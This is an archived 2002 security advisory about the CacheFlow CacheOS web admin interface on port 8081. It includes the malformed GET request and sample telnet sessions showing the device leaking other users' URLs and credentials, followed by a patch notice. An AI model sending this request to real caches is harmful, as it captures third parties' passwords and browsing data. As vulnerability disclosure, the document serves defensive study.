9th Jan 2002   [SBWID-4982]
	
COMMAND
	CacheFlow Web admin interface may reveal user/pass to all
SYSTEMS AFFECTED
	CacheOS v3.1.* maybe v4.*
PROBLEM
	In svindel.net research team advisory [http://www.svindel.net] :
	
	The CacheFlow has a web-admin interface open at port  8081  by  default.
	By sending a certain request, malicious hosts  can  view  parts  of  web
	pages and url\'s transferred through the cache at the time. Examples  of
	data that may be gathered using this  method  are,  usernames/passwords,
	form contents, url\'s etc..
	
	Exploit:
	
	telnet or use nc to connect to port 8081, then issue the following command:
	GET /Secure/Local/console/cmhome.htm
	
	Now legally in http you should also supply something  like  HTTP/1.0  at
	the end of that string, if you do that then the cache  replies  that  my
	station is not authorized to view page. If you omit HTTP/1.0 like I  did
	above, most times the cache just issues this:
	
	Example exploit session:
	
	localhost:~# telnet cacheflow 8081
	Trying xxx.xxx.xxx.xxx...
	Connected to cacheflow.
	Escape character is \'^]\'.
	GET /Secure/Local/console/cmhome.htm
	
	HTTP/1.0 200 OK
	
	Request cannot be honored
	Connection closed by foreign host
	
	
	But if you try multiple times it will sometimes  return  something  like
	this:
	
	 
	localhost:~# telnet cacheflow 8081
	Trying xxx.xxx.xxx.xxx...
	Connected to cacheflow.
	Escape character is \'^]\'.
	GET /Secure/Local/console/cmhome.htm
	
	HTTP/1.0 404-Not Found
	
	<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The
	request
	ed URL \"/Secure/Local/console/cmhome.htm
	
	Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234
	acbe
	&sid=3c234acbec234acbe&ord=1\" was not found on this
	server.<P></BODY>Connection
	closed by foreign host.
	
	
	As you can see, the chunk of  code  it  blurted  out  in  the  404  page
	contained part of an url that a client on the cache was visiting at  the
	time. We have also been able to read passwords from  URL\'s  using  this
	technique. There are probably more ways  to  exploit  this  and  greater
	holes to be found, but we didn\'t find any.. feel free  to  poke  around
	:)
SOLUTION
	 Update (05 Februrary 2002) 
	 ======
	
	Patch available from :
	
	http://download.cacheflow.com/
	
	The specific reference to the software update is  contained  within  the
	Release Notes for CacheOS Versions 4.0.14, Release ID 17085  and  17087,
	as follows:
	
	http://download.cacheflow.com/release/SA/4.0.14/relnotes.htm
	http://download.cacheflow.com/release/CA/4.0.14/relnotes.htm
	
	.SR 1-1350501: This update modified a condition  where  sending  \"GET\"
	to the console port could result in an illegible  message.  This  update
	addresses the potential BugTraq security issue.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH